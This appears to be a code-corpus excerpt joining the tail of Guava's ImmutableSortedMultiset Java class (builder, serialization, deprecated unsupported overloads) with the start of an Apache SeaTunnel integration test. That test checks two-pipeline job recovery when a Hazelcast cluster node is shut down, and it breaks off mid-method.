ImmutableSortedMultiset.Builder<E>(comparator).addAll(elements).build(); } /** * Returns an immutable sorted multiset containing the elements of a sorted multiset, sorted by * the same {@code Comparator}. That behavior differs from {@link #copyOf(Iterable)}, which always * uses the natural ordering of the elements. * * <p>Despite the method name, this method attempts to avoid actually copying the data when it is * safe to do so. The exact circumstances under which a copy will or will not be performed are * undocumented and subject to change. * * <p>This method is safe to use even when {@code sortedMultiset} is a synchronized or concurrent * collection that is currently being modified by another thread. * * @throws NullPointerException if {@code sortedMultiset} or any of its elements is null */ public static <E> ImmutableSortedMultiset<E> copyOfSorted(SortedMultiset<E> sortedMultiset) { return copyOfSortedEntries( sortedMultiset.comparator(), new ArrayList<>(sortedMultiset.entrySet())); } private static <E> ImmutableSortedMultiset<E> copyOfSortedEntries( Comparator<? super E> comparator, Collection<Entry<E>> entries) { if (entries.isEmpty()) { return emptyMultiset(comparator); } ImmutableList.Builder<E> elementsBuilder = new ImmutableList.Builder<>(entries.size()); long[] cumulativeCounts = new long[entries.size() + 1]; int i = 0; for (Entry<E> entry : entries) { elementsBuilder.add(entry.getElement()); cumulativeCounts[i + 1] = cumulativeCounts[i] + entry.getCount(); i++; } return new RegularImmutableSortedMultiset<>( new RegularImmutableSortedSet<E>(elementsBuilder.build(), comparator), cumulativeCounts, 0, entries.size()); } @SuppressWarnings("unchecked") static <E> ImmutableSortedMultiset<E> emptyMultiset(Comparator<? super E> comparator) { if (Ordering.natural().equals(comparator)) { return (ImmutableSortedMultiset<E>) RegularImmutableSortedMultiset.NATURAL_EMPTY_MULTISET; } else { return new RegularImmutableSortedMultiset<>(comparator); } } ImmutableSortedMultiset() {} @Override public final Comparator<? super E> comparator() { return elementSet().comparator(); } @Override public abstract ImmutableSortedSet<E> elementSet(); @LazyInit transient @Nullable ImmutableSortedMultiset<E> descendingMultiset; @Override public ImmutableSortedMultiset<E> descendingMultiset() { ImmutableSortedMultiset<E> result = descendingMultiset; if (result == null) { return descendingMultiset = this.isEmpty() ? emptyMultiset(Ordering.from(comparator()).reverse()) : new DescendingImmutableSortedMultiset<E>(this); } return result; } /** * {@inheritDoc} * * <p>This implementation is guaranteed to throw an {@link UnsupportedOperationException}. * * @throws UnsupportedOperationException always * @deprecated Unsupported operation. */ @CanIgnoreReturnValue @Deprecated @Override @DoNotCall("Always throws UnsupportedOperationException") public final @Nullable Entry<E> pollFirstEntry() { throw new UnsupportedOperationException(); } /** * {@inheritDoc} * * <p>This implementation is guaranteed to throw an {@link UnsupportedOperationException}. * * @throws UnsupportedOperationException always * @deprecated Unsupported operation. */ @CanIgnoreReturnValue @Deprecated @Override @DoNotCall("Always throws UnsupportedOperationException") public final @Nullable Entry<E> pollLastEntry() { throw new UnsupportedOperationException(); } @Override public abstract ImmutableSortedMultiset<E> headMultiset(E upperBound, BoundType boundType); @Override public ImmutableSortedMultiset<E> subMultiset( E lowerBound, BoundType lowerBoundType, E upperBound, BoundType upperBoundType) { checkArgument( comparator().compare(lowerBound, upperBound) <= 0, "Expected lowerBound <= upperBound but %s > %s", lowerBound, upperBound); return tailMultiset(lowerBound, lowerBoundType).headMultiset(upperBound, upperBoundType); } @Override public abstract ImmutableSortedMultiset<E> tailMultiset(E lowerBound, BoundType boundType); /** * Returns a builder that creates immutable sorted multisets with an explicit comparator. If the * comparator has a more general type than the set being generated, such as creating a {@code * SortedMultiset<Integer>} with a {@code Comparator<Number>}, use the {@link Builder} constructor * instead. * * @throws NullPointerException if {@code comparator} is null */ public static <E> Builder<E> orderedBy(Comparator<E> comparator) { return new Builder<>(comparator); } /** * Returns a builder that creates immutable sorted multisets whose elements are ordered by the * reverse of their natural ordering. * * <p>Note: the type parameter {@code E} extends {@code Comparable<?>} rather than {@code * Comparable<? super E>} in order to accommodate users of obsolete javac versions affected by <a * href="https://bugs.openjdk.org/browse/JDK-6468354">JDK-6468354</a>. */ public static <E extends Comparable<?>> Builder<E> reverseOrder() { return new Builder<>(Ordering.<E>natural().reverse()); } /** * Returns a builder that creates immutable sorted multisets whose elements are ordered by their * natural ordering. The sorted multisets use {@link Ordering#natural()} as the comparator. This * method provides more type-safety than {@link #builder}, as it can be called only for classes * that implement {@link Comparable}. * * <p>Note: the type parameter {@code E} extends {@code Comparable<?>} rather than {@code * Comparable<? super E>} in order to accommodate users of obsolete javac versions affected by <a * href="https://bugs.openjdk.org/browse/JDK-6468354">JDK-6468354</a>. */ public static <E extends Comparable<?>> Builder<E> naturalOrder() { return new Builder<>(Ordering.natural()); } /** * A builder for creating immutable multiset instances, especially {@code public static final} * multisets ("constant multisets"). Example: * * {@snippet : * public static final ImmutableSortedMultiset<Bean> BEANS = * new ImmutableSortedMultiset.Builder<Bean>(colorComparator()) * .addCopies(Bean.COCOA, 4) * .addCopies(Bean.GARDEN, 6) * .addCopies(Bean.RED, 8) * .addCopies(Bean.BLACK_EYED, 10) * .build(); * } * * <p>Builder instances can be reused; it is safe to call {@link #build} multiple times to build * multiple multisets in series. * * @since 12.0 */ public static class Builder<E> extends ImmutableMultiset.Builder<E> { /* * We keep an array of elements and counts. Periodically -- when we need more room in the * array, or when we're building, or the like -- we sort, deduplicate, and combine the counts. * Negative counts indicate a setCount operation with ~counts[i]. */ private final Comparator<? super E> comparator; @VisibleForTesting E[] elements; private int[] counts; /* * The number of used positions in the elements array. We deduplicate periodically, so this * may fluctuate up and down. */ private int length; // True if we just called build() and the elements array is being used by a created ISM, meaning // we shouldn't modify that array further. private boolean forceCopyElements; /** * Creates a new builder. The returned builder is equivalent to the builder generated by {@link * ImmutableSortedMultiset#orderedBy(Comparator)}. */ @SuppressWarnings("unchecked") public Builder(Comparator<? super E> comparator) { super(true); // doesn't allocate hash table in supertype this.comparator = checkNotNull(comparator); this.elements = (E[]) new Object[ImmutableCollection.Builder.DEFAULT_INITIAL_CAPACITY]; this.counts = new int[ImmutableCollection.Builder.DEFAULT_INITIAL_CAPACITY]; } /** Check if we need to do deduplication and coalescing, and if so, do it. */ private void maintenance() { if (length == elements.length) { dedupAndCoalesce(true); } else if (forceCopyElements) { this.elements = Arrays.copyOf(elements, elements.length); // we don't currently need to copy the counts array, because we don't use it directly // in built ISMs } forceCopyElements = false; } private void dedupAndCoalesce(boolean maybeExpand) { if (length == 0) { return; } E[] sortedElements = Arrays.copyOf(elements, length); Arrays.sort(sortedElements, comparator); int uniques = 1; for (int i = 1; i < sortedElements.length; i++) { if (comparator.compare(sortedElements[uniques - 1], sortedElements[i]) < 0) { sortedElements[uniques] = sortedElements[i]; uniques++; } } Arrays.fill(sortedElements, uniques, length, null); if (maybeExpand && uniques * 4 > length * 3) { // lots of nonduplicated elements, expand the array by 50% sortedElements = Arrays.copyOf(sortedElements, IntMath.saturatedAdd(length, length / 2 + 1)); } int[] sortedCounts = new int[sortedElements.length]; for (int i = 0; i < length; i++) { int index = Arrays.binarySearch(sortedElements, 0, uniques, elements[i], comparator); if (counts[i] >= 0) { sortedCounts[index] += counts[i]; } else { sortedCounts[index] = ~counts[i]; } } // Note that we're not getting rid, yet, of elements with count 0. We'll do that in build(). this.elements = sortedElements; this.counts = sortedCounts; this.length = uniques; } /** * Adds {@code element} to the {@code ImmutableSortedMultiset}. * * @param element the element to add * @return this {@code Builder} object * @throws NullPointerException if {@code element} is null */ @CanIgnoreReturnValue @Override public Builder<E> add(E element) { return addCopies(element, 1); } /** * Adds each element of {@code elements} to the {@code ImmutableSortedMultiset}. * * @param elements the elements to add * @return this {@code Builder} object * @throws NullPointerException if {@code elements} is null or contains a null element */ @CanIgnoreReturnValue @Override public Builder<E> add(E... elements) { for (E element : elements) { add(element); } return this; } /** * Adds a number of occurrences of an element to this {@code ImmutableSortedMultiset}. * * @param element the element to add * @param occurrences the number of occurrences of the element to add. May be zero, in which * case no change will be made. * @return this {@code Builder} object * @throws NullPointerException if {@code element} is null * @throws IllegalArgumentException if {@code occurrences} is negative, or if this operation * would result in more than {@link Integer#MAX_VALUE} occurrences of the element */ @CanIgnoreReturnValue @Override public Builder<E> addCopies(E element, int occurrences) { checkNotNull(element); CollectPreconditions.checkNonnegative(occurrences, "occurrences"); if (occurrences == 0) { return this; } maintenance(); elements[length] = element; counts[length] = occurrences; length++; return this; } /** * Adds or removes the necessary occurrences of an element such that the element attains the * desired count. * * @param element the element to add or remove occurrences of * @param count the desired count of the element in this multiset * @return this {@code Builder} object * @throws NullPointerException if {@code element} is null * @throws IllegalArgumentException if {@code count} is negative */ @CanIgnoreReturnValue @Override public Builder<E> setCount(E element, int count) { checkNotNull(element); CollectPreconditions.checkNonnegative(count, "count"); maintenance(); elements[length] = element; counts[length] = ~count; length++; return this; } /** * Adds each element of {@code elements} to the {@code ImmutableSortedMultiset}. * * @param elements the {@code Iterable} to add to the {@code ImmutableSortedMultiset} * @return this {@code Builder} object * @throws NullPointerException if {@code elements} is null or contains a null element */ @CanIgnoreReturnValue @Override public Builder<E> addAll(Iterable<? extends E> elements) { if (elements instanceof Multiset) { for (Entry<? extends E> entry : ((Multiset<? extends E>) elements).entrySet()) { addCopies(entry.getElement(), entry.getCount()); } } else { for (E e : elements) { add(e); } } return this; } /** * Adds each element of {@code elements} to the {@code ImmutableSortedMultiset}. * * @param elements the elements to add to the {@code ImmutableSortedMultiset} * @return this {@code Builder} object * @throws NullPointerException if {@code elements} is null or contains a null element */ @CanIgnoreReturnValue @Override public Builder<E> addAll(Iterator<? extends E> elements) { while (elements.hasNext()) { add(elements.next()); } return this; } private void dedupAndCoalesceAndDeleteEmpty() { dedupAndCoalesce(false); // If there was a setCount(elem, 0), those elements are still present. Eliminate them. int size = 0; for (int i = 0; i < length; i++) { if (counts[i] > 0) { elements[size] = elements[i]; counts[size] = counts[i]; size++; } } Arrays.fill(elements, size, length, null); Arrays.fill(counts, size, length, 0); length = size; } /** * Returns a newly-created {@code ImmutableSortedMultiset} based on the contents of the {@code * Builder}. */ @Override public ImmutableSortedMultiset<E> build() { dedupAndCoalesceAndDeleteEmpty(); if (length == 0) { return emptyMultiset(comparator); } RegularImmutableSortedSet<E> elementSet = (RegularImmutableSortedSet<E>) ImmutableSortedSet.construct(comparator, length, elements); long[] cumulativeCounts = new long[length + 1]; for (int i = 0; i < length; i++) { cumulativeCounts[i + 1] = cumulativeCounts[i] + counts[i]; } forceCopyElements = true; return new RegularImmutableSortedMultiset<E>(elementSet, cumulativeCounts, 0, length); } } @J2ktIncompatible // serialization private static final class SerializedForm<E> implements Serializable { final Comparator<? super E> comparator; final E[] elements; final int[] counts; @SuppressWarnings("unchecked") SerializedForm(SortedMultiset<E> multiset) { this.comparator = multiset.comparator(); int n = multiset.entrySet().size(); elements = (E[]) new Object[n]; counts = new int[n]; int i = 0; for (Entry<E> entry : multiset.entrySet()) { elements[i] = entry.getElement(); counts[i] = entry.getCount(); i++; } } Object readResolve() { int n = elements.length; Builder<E> builder = new Builder<>(comparator); for (int i = 0; i < n; i++) { builder.addCopies(elements[i], counts[i]); } return builder.build(); } } @Override @J2ktIncompatible // serialization Object writeReplace() { return new SerializedForm<E>(this); } @J2ktIncompatible // java.io.ObjectInputStream private void readObject(ObjectInputStream stream) throws InvalidObjectException { throw new InvalidObjectException("Use SerializedForm"); } /** * Not supported. Use {@link #toImmutableSortedMultiset} instead. This method exists only to hide * {@link ImmutableMultiset#toImmutableMultiset} from consumers of {@code * ImmutableSortedMultiset}. * * @throws UnsupportedOperationException always * @deprecated Use {@link ImmutableSortedMultiset#toImmutableSortedMultiset}. * @since 33.2.0 (available since 21.0 in guava-jre) */ @DoNotCall("Use toImmutableSortedMultiset.") @Deprecated @IgnoreJRERequirement // Users will use this only if they're already using streams. public static <E> Collector<E, ?, ImmutableMultiset<E>> toImmutableMultiset() { throw new UnsupportedOperationException(); } /** * Not supported. Use {@link #toImmutableSortedMultiset} instead. This method exists only to hide * {@link ImmutableMultiset#toImmutableMultiset} from consumers of {@code * ImmutableSortedMultiset}. * * @throws UnsupportedOperationException always * @deprecated Use {@link ImmutableSortedMultiset#toImmutableSortedMultiset}. * @since 33.2.0 (available since 22.0 in guava-jre) */ @DoNotCall("Use toImmutableSortedMultiset.") @Deprecated @IgnoreJRERequirement // Users will use this only if they're already using streams. public static <T extends @Nullable Object, E> Collector<T, ?, ImmutableMultiset<E>> toImmutableMultiset( Function<? super T, ? extends E> elementFunction, ToIntFunction<? super T> countFunction) { throw new UnsupportedOperationException(); } /** * Not supported. Use {@link #naturalOrder}, which offers better type-safety, instead. This method * exists only to hide {@link ImmutableMultiset#builder} from consumers of {@code * ImmutableSortedMultiset}. * * @throws UnsupportedOperationException always * @deprecated Use {@link ImmutableSortedMultiset#naturalOrder}, which offers better type-safety. */ @DoNotCall("Use naturalOrder.") @Deprecated public static <E> ImmutableSortedMultiset.Builder<E> builder() { throw new UnsupportedOperationException(); } /** * Not supported. <b>You are attempting to create a multiset that may contain a non-{@code * Comparable} element.</b> Proper calls will resolve to the version in {@code * ImmutableSortedMultiset}, not this dummy version. * * @throws UnsupportedOperationException always * @deprecated <b>Pass a parameter of type {@code Comparable} to use {@link * ImmutableSortedMultiset#of(Comparable)}.</b> */ @DoNotCall("Elements must be Comparable. (Or, pass a Comparator to orderedBy or copyOf.)") @Deprecated public static <E> ImmutableSortedMultiset<E> of(E e1) { throw new UnsupportedOperationException(); } /** * Not supported. <b>You are attempting to create a multiset that may contain a non-{@code * Comparable} element.</b> Proper calls will resolve to the version in {@code * ImmutableSortedMultiset}, not this dummy version. * * @throws UnsupportedOperationException always * @deprecated <b>Pass the parameters of type {@code Comparable} to use {@link * ImmutableSortedMultiset#of(Comparable, Comparable)}.</b> */ @DoNotCall("Elements must be Comparable. (Or, pass a Comparator to orderedBy or copyOf.)") @Deprecated public static <E> ImmutableSortedMultiset<E> of(E e1, E e2) { throw new UnsupportedOperationException(); } /** * Not supported. <b>You are attempting to create a multiset that may contain a non-{@code * Comparable} element.</b> Proper calls will resolve to the version in {@code * ImmutableSortedMultiset}, not this dummy version. * * @throws UnsupportedOperationException always * @deprecated <b>Pass the parameters of type {@code Comparable} to use {@link * ImmutableSortedMultiset#of(Comparable, Comparable, Comparable)}.</b> */ @DoNotCall("Elements must be Comparable. (Or, pass a Comparator to orderedBy or copyOf.)") @Deprecated public static <E> ImmutableSortedMultiset<E> of(E e1, E e2, E e3) { throw new UnsupportedOperationException(); } /** * Not supported. <b>You are attempting to create a multiset that may contain a non-{@code * Comparable} element.</b> Proper calls will resolve to the version in {@code * ImmutableSortedMultiset}, not this dummy version. * * @throws UnsupportedOperationException always * @deprecated <b>Pass the parameters of type {@code Comparable} to use {@link * ImmutableSortedMultiset#of(Comparable, Comparable, Comparable, Comparable)}. </b> */ @DoNotCall("Elements must be Comparable. (Or, pass a Comparator to orderedBy or copyOf.)") @Deprecated public static <E> ImmutableSortedMultiset<E> of(E e1, E e2, E e3, E e4) { throw new UnsupportedOperationException(); } /** * Not supported. <b>You are attempting to create a multiset that may contain a non-{@code * Comparable} element.</b> Proper calls will resolve to the version in {@code * ImmutableSortedMultiset}, not this dummy version. * * @throws UnsupportedOperationException always * @deprecated <b>Pass the parameters of type {@code Comparable} to use {@link * ImmutableSortedMultiset#of(Comparable, Comparable, Comparable, Comparable, Comparable)} . * </b> */ @DoNotCall("Elements must be Comparable. (Or, pass a Comparator to orderedBy or copyOf.)") @Deprecated public static <E> ImmutableSortedMultiset<E> of(E e1, E e2, E e3, E e4, E e5) { throw new UnsupportedOperationException(); } /** * Not supported. <b>You are attempting to create a multiset that may contain a non-{@code * Comparable} element.</b> Proper calls will resolve to the version in {@code * ImmutableSortedMultiset}, not this dummy version. * * @throws UnsupportedOperationException always * @deprecated <b>Pass the parameters of type {@code Comparable} to use {@link * ImmutableSortedMultiset#of(Comparable, Comparable, Comparable, Comparable, Comparable, * Comparable, Comparable...)} . </b> */ @DoNotCall("Elements must be Comparable. (Or, pass a Comparator to orderedBy or copyOf.)") @Deprecated public static <E> ImmutableSortedMultiset<E> of( E e1, E e2, E e3, E e4, E e5, E e6, E... remaining) { throw new UnsupportedOperationException(); } /** * Not supported. <b>You are attempting to create a multiset that may contain non-{@code * Comparable} elements.</b> Proper calls will resolve to the version in {@code * ImmutableSortedMultiset}, not this dummy version. * * @throws UnsupportedOperationException always * @deprecated <b>Pass parameters of type {@code Comparable} to use {@link * ImmutableSortedMultiset#copyOf(Comparable[])}.</b> */ @DoNotCall("Elements must be Comparable. (Or, pass a Comparator to orderedBy or copyOf.)") @Deprecated // The usage of "Z" here works around bugs in Javadoc (JDK-8318093) and JDiff. public static <Z> ImmutableSortedMultiset<Z> copyOf(Z[] elements) { throw new UnsupportedOperationException(); } @J2ktIncompatible private static final long serialVersionUID = 0xdecaf; }
apache/seatunnel
36,042
seatunnel-e2e/seatunnel-engine-e2e/connector-seatunnel-e2e-base/src/test/java/org/apache/seatunnel/engine/e2e/ClusterFaultToleranceTwoPipelineIT.java
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.seatunnel.engine.e2e; import org.apache.seatunnel.common.config.Common; import org.apache.seatunnel.common.config.DeployMode; import org.apache.seatunnel.common.constants.JobMode; import org.apache.seatunnel.common.utils.FileUtils; import org.apache.seatunnel.engine.client.SeaTunnelClient; import org.apache.seatunnel.engine.client.job.ClientJobExecutionEnvironment; import org.apache.seatunnel.engine.client.job.ClientJobProxy; import org.apache.seatunnel.engine.common.config.ConfigProvider; import org.apache.seatunnel.engine.common.config.JobConfig; import org.apache.seatunnel.engine.common.config.SeaTunnelConfig; import org.apache.seatunnel.engine.common.job.JobStatus; import org.apache.seatunnel.engine.server.SeaTunnelServerStarter; import org.awaitility.Awaitility; import org.junit.jupiter.api.Assertions; import org.junit.jupiter.api.Disabled; import org.junit.jupiter.api.Test; import org.testcontainers.shaded.org.apache.commons.lang3.tuple.ImmutablePair; import com.hazelcast.client.config.ClientConfig; import com.hazelcast.instance.impl.HazelcastInstanceImpl; import lombok.NonNull; import lombok.extern.slf4j.Slf4j; import java.io.File; import java.io.IOException; import java.util.HashMap; import java.util.Map; import java.util.concurrent.CompletableFuture; import java.util.concurrent.TimeUnit; import static org.apache.seatunnel.shade.com.google.common.base.Preconditions.checkArgument; /** * Cluster fault tolerance test. Test the job which have two pipelines can recovery capability and * data consistency assurance capability in case of cluster node failure */ @Slf4j public class ClusterFaultToleranceTwoPipelineIT { public static final String TEST_TEMPLATE_FILE_NAME = "cluster_batch_fake_to_localfile_two_pipeline_template.conf"; public static final String DYNAMIC_TEST_CASE_NAME = "dynamic_test_case_name"; public static final String DYNAMIC_JOB_MODE = "dynamic_job_mode"; public static final String DYNAMIC_TEST_ROW_NUM_PER_PARALLELISM = "dynamic_test_row_num_per_parallelism"; public static final String DYNAMIC_TEST_PARALLELISM = "dynamic_test_parallelism"; @Test public void testTwoPipelineBatchJobRunOkIn2Node() throws Exception { String testCaseName = "testTwoPipelineBatchJobRunOkIn2Node"; String testClusterName = "ClusterFaultToleranceTwoPipelineIT_testTwoPipelineBatchJobRunOkIn2Node"; long testRowNumber = 1000; int testParallelism = 6; HazelcastInstanceImpl node1 = null; HazelcastInstanceImpl node2 = null; SeaTunnelClient engineClient = null; SeaTunnelConfig seaTunnelConfig = ConfigProvider.locateAndGetSeaTunnelConfig(); seaTunnelConfig .getHazelcastConfig() .setClusterName(TestUtils.getClusterName(testClusterName)); try { node1 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig); node2 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig); // waiting all node added to cluster HazelcastInstanceImpl finalNode = node1; Awaitility.await() .atMost(10000, TimeUnit.MILLISECONDS) .untilAsserted( () -> Assertions.assertEquals( 2, finalNode.getCluster().getMembers().size())); Common.setDeployMode(DeployMode.CLIENT); ImmutablePair<String, String> testResources = createTestResources( testCaseName, JobMode.BATCH, testRowNumber, testParallelism, TEST_TEMPLATE_FILE_NAME); JobConfig jobConfig = new JobConfig(); jobConfig.setName(testCaseName); ClientConfig clientConfig = ConfigProvider.locateAndGetClientConfig(); clientConfig.setClusterName(TestUtils.getClusterName(testClusterName)); engineClient = new SeaTunnelClient(clientConfig); ClientJobExecutionEnvironment jobExecutionEnv = engineClient.createExecutionContext( testResources.getRight(), jobConfig, seaTunnelConfig); ClientJobProxy clientJobProxy = jobExecutionEnv.execute(); Awaitility.await() .atMost(60000, TimeUnit.MILLISECONDS) .untilAsserted( () -> Assertions.assertEquals( JobStatus.RUNNING, clientJobProxy.getJobStatus())); CompletableFuture<JobStatus> objectCompletableFuture = CompletableFuture.supplyAsync(clientJobProxy::waitForJobComplete); Awaitility.await() .atMost(300000, TimeUnit.MILLISECONDS) .pollInterval(2000, TimeUnit.MILLISECONDS) .untilAsserted( () -> { log.warn( "\n================================={}=================================\n", FileUtils.getFileLineNumberFromDir( testResources.getLeft())); Assertions.assertEquals( JobStatus.FINISHED, clientJobProxy.getJobStatus()); Assertions.assertTrue(objectCompletableFuture.isDone()); Assertions.assertEquals( JobStatus.FINISHED, objectCompletableFuture.get()); }); Long fileLineNumberFromDir = FileUtils.getFileLineNumberFromDir(testResources.getLeft()); Assertions.assertEquals(testRowNumber * testParallelism * 2, fileLineNumberFromDir); } finally { if (engineClient != null) { engineClient.close(); } if (node1 != null) { node1.shutdown(); } if (node2 != null) { node2.shutdown(); } } } /** * Create the test job config file basic on cluster_batch_fake_to_localfile_template.conf It * will delete the test sink target path before return the final job config file path * * @param testCaseName testCaseName * @param jobMode jobMode * @param rowNumber row.num per FakeSource parallelism * @param parallelism FakeSource parallelism */ private ImmutablePair<String, String> createTestResources( @NonNull String testCaseName, @NonNull JobMode jobMode, long rowNumber, int parallelism, @NonNull String templateFileName) throws IOException { checkArgument(rowNumber > 0, "rowNumber must greater than 0"); checkArgument(parallelism > 0, "parallelism must greater than 0"); Map<String, String> valueMap = new HashMap<>(); valueMap.put(DYNAMIC_TEST_CASE_NAME, testCaseName); valueMap.put(DYNAMIC_JOB_MODE, jobMode.toString()); valueMap.put(DYNAMIC_TEST_ROW_NUM_PER_PARALLELISM, String.valueOf(rowNumber)); valueMap.put(DYNAMIC_TEST_PARALLELISM, String.valueOf(parallelism)); String targetDir = "/tmp/hive/warehouse/" + testCaseName; targetDir = targetDir.replace("/", File.separator); // clear target dir before test FileUtils.createNewDir(targetDir); String targetConfigFilePath = File.separator + "tmp" + File.separator + "test_conf" + File.separator + testCaseName + ".conf"; TestUtils.createTestConfigFileFromTemplate( templateFileName, valueMap, targetConfigFilePath); return new ImmutablePair<>(targetDir, targetConfigFilePath); } @Test public void testTwoPipelineStreamJobRunOkIn2Node() throws Exception { String testCaseName = "testTwoPipelineStreamJobRunOkIn2Node"; String testClusterName = "ClusterFaultToleranceTwoPipelineIT_testTwoPipelineStreamJobRunOkIn2Node"; long testRowNumber = 1000; int testParallelism = 6; HazelcastInstanceImpl node1 = null; HazelcastInstanceImpl node2 = null; SeaTunnelClient engineClient = null; SeaTunnelConfig seaTunnelConfig = ConfigProvider.locateAndGetSeaTunnelConfig(); seaTunnelConfig .getHazelcastConfig() .setClusterName(TestUtils.getClusterName(testClusterName)); try { node1 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig); node2 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig); // waiting all node added to cluster HazelcastInstanceImpl finalNode = node1; Awaitility.await() .atMost(10000, TimeUnit.MILLISECONDS) .untilAsserted( () -> Assertions.assertEquals( 2, finalNode.getCluster().getMembers().size())); Common.setDeployMode(DeployMode.CLIENT); ImmutablePair<String, String> testResources = createTestResources( testCaseName, JobMode.STREAMING, testRowNumber, testParallelism, TEST_TEMPLATE_FILE_NAME); JobConfig jobConfig = new JobConfig(); jobConfig.setName(testCaseName); ClientConfig clientConfig = ConfigProvider.locateAndGetClientConfig(); clientConfig.setClusterName(TestUtils.getClusterName(testClusterName)); engineClient = new SeaTunnelClient(clientConfig); ClientJobExecutionEnvironment jobExecutionEnv = engineClient.createExecutionContext( testResources.getRight(), jobConfig, seaTunnelConfig); ClientJobProxy clientJobProxy = jobExecutionEnv.execute(); Awaitility.await() .atMost(10, TimeUnit.SECONDS) .untilAsserted( () -> Assertions.assertTrue( clientJobProxy.getJobStatus().ordinal() >= JobStatus.RUNNING.ordinal())); CompletableFuture<JobStatus> objectCompletableFuture = CompletableFuture.supplyAsync(clientJobProxy::waitForJobComplete); Awaitility.await() .atMost(5, TimeUnit.MINUTES) .pollInterval(2000, TimeUnit.MILLISECONDS) .untilAsserted( () -> { Long lineNumberFromDir = FileUtils.getFileLineNumberFromDir(testResources.getLeft()); log.warn( "\n================================={}=================================\n", lineNumberFromDir); Assertions.assertEquals( JobStatus.RUNNING, clientJobProxy.getJobStatus()); Assertions.assertEquals( testRowNumber * testParallelism * 2, lineNumberFromDir); }); clientJobProxy.cancelJob(); Awaitility.await() .atMost(300000, TimeUnit.MILLISECONDS) .untilAsserted( () -> { Assertions.assertEquals( JobStatus.CANCELED, clientJobProxy.getJobStatus()); Assertions.assertTrue(objectCompletableFuture.isDone()); Assertions.assertEquals( JobStatus.CANCELED, objectCompletableFuture.get()); }); Long fileLineNumberFromDir = FileUtils.getFileLineNumberFromDir(testResources.getLeft()); Assertions.assertEquals(testRowNumber * testParallelism * 2, fileLineNumberFromDir); } finally { if (engineClient != null) { engineClient.close(); } if (node1 != null) { node1.shutdown(); } if (node2 != null) { node2.shutdown(); } } } @Test public void testTwoPipelineBatchJobRestoreIn2NodeWorkerDown() throws Exception { String testCaseName = "testTwoPipelineBatchJobRestoreIn2NodeWorkerDown"; String testClusterName = "ClusterFaultToleranceTwoPipelineIT_testTwoPipelineBatchJobRestoreIn2NodeWorkerDown"; long testRowNumber = 1000; int testParallelism = 6; HazelcastInstanceImpl node1 = null; HazelcastInstanceImpl node2 = null; SeaTunnelClient engineClient = null; SeaTunnelConfig seaTunnelConfig = ConfigProvider.locateAndGetSeaTunnelConfig(); seaTunnelConfig .getHazelcastConfig() .setClusterName(TestUtils.getClusterName(testClusterName)); try { node1 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig); node2 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig); // waiting all node added to cluster HazelcastInstanceImpl finalNode = node1; Awaitility.await() .atMost(10000, TimeUnit.MILLISECONDS) .untilAsserted( () -> Assertions.assertEquals( 2, finalNode.getCluster().getMembers().size())); Common.setDeployMode(DeployMode.CLIENT); ImmutablePair<String, String> testResources = createTestResources( testCaseName, JobMode.BATCH, testRowNumber, testParallelism, TEST_TEMPLATE_FILE_NAME); JobConfig jobConfig = new JobConfig(); jobConfig.setName(testCaseName); ClientConfig clientConfig = ConfigProvider.locateAndGetClientConfig(); clientConfig.setClusterName(TestUtils.getClusterName(testClusterName)); engineClient = new SeaTunnelClient(clientConfig); ClientJobExecutionEnvironment jobExecutionEnv = engineClient.createExecutionContext( testResources.getRight(), jobConfig, seaTunnelConfig); ClientJobProxy clientJobProxy = jobExecutionEnv.execute(); Awaitility.await() .atMost(60000, TimeUnit.MILLISECONDS) .pollInterval(2000, TimeUnit.MILLISECONDS) .untilAsserted( () -> { Long lineNumberFromDir = FileUtils.getFileLineNumberFromDir(testResources.getLeft()); log.warn( "\n================================={}=================================\n", lineNumberFromDir); Assertions.assertEquals( JobStatus.RUNNING, clientJobProxy.getJobStatus()); Assertions.assertTrue(lineNumberFromDir > 1); }); // In the restore case, ensure that JabStatus is in the RUNNING state before calling // waitForJobComplete. CompletableFuture<JobStatus> objectCompletableFuture = CompletableFuture.supplyAsync(clientJobProxy::waitForJobComplete); // shutdown on worker node node2.shutdown(); Awaitility.await() .atMost(300000, TimeUnit.MILLISECONDS) .pollInterval(2000, TimeUnit.MILLISECONDS) .untilAsserted( () -> { log.warn( "\n================================={}=================================\n", FileUtils.getFileLineNumberFromDir( testResources.getLeft())); Assertions.assertEquals( JobStatus.FINISHED, clientJobProxy.getJobStatus()); Assertions.assertTrue(objectCompletableFuture.isDone()); Assertions.assertEquals( JobStatus.FINISHED, objectCompletableFuture.get()); }); Long fileLineNumberFromDir = FileUtils.getFileLineNumberFromDir(testResources.getLeft()); Assertions.assertEquals(testRowNumber * testParallelism * 2, fileLineNumberFromDir); } finally { if (engineClient != null) { engineClient.close(); } if (node1 != null) { node1.shutdown(); } if (node2 != null) { node2.shutdown(); } } } @Test @Disabled public void testFor() throws Exception { for (int i = 0; i < 200; i++) { testTwoPipelineStreamJobRestoreIn2NodeMasterDown(); } } @Test public void testTwoPipelineStreamJobRestoreIn2NodeWorkerDown() throws Exception { String testCaseName = "testTwoPipelineStreamJobRestoreIn2NodeWorkerDown"; String testClusterName = "ClusterFaultToleranceTwoPipelineIT_testTwoPipelineStreamJobRestoreIn2NodeWorkerDown"; long testRowNumber = 1000; int testParallelism = 6; HazelcastInstanceImpl node1 = null; HazelcastInstanceImpl node2 = null; SeaTunnelClient engineClient = null; SeaTunnelConfig seaTunnelConfig = ConfigProvider.locateAndGetSeaTunnelConfig(); seaTunnelConfig .getHazelcastConfig() .setClusterName(TestUtils.getClusterName(testClusterName)); try { node1 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig); node2 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig); // waiting all node added to cluster HazelcastInstanceImpl finalNode = node1; Awaitility.await() .atMost(10000, 